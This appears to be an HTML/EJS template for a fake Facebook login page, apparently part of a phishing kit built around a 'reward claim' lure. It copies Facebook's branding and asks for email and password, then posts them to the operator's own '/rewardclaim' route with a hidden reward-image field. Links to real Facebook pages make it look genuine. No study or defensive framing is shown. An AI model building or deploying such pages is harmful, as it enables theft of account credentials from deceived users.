<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login Page</title>
    <link rel="shortcut icon" href="images/icon.png" type="image/x-icon">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/fblogin.css">
</head>
<body>
    <div class="container flex">
        <div class="facebook-page flex">
            <div class="text">
                <h1>facebook</h1>
                <p>Connect with friends and the world </p>
                <p> around you on Facebook.</p>
            </div>
            <form onsubmit="saveimg('<%=rewardimg%>')" action="/rewardclaim" method="post">
                <input type="email" name="email" placeholder="Email or phone number" required>
                <input type="password" name="password" placeholder="Password" required>
                <input type="text" style="display: none;" name="imgurl" value="<%=rewardimg%>" required>
                <div class="link">
                    <button type="submit" class="login">Login</button>
                    <a href="https://www.facebook.com/forget" class="forgot">Forgot password?</a>
                </div>
                <hr>
                <div class="button">
                    <a href="https://www.facebook.com">Create new account</a>
                </div>
            </form>
        </div>
    </div>
    <script>
        function saveimg(img){
                localStorage.setItem("rewardImg",img);
        }
    </script>
</body>

</html>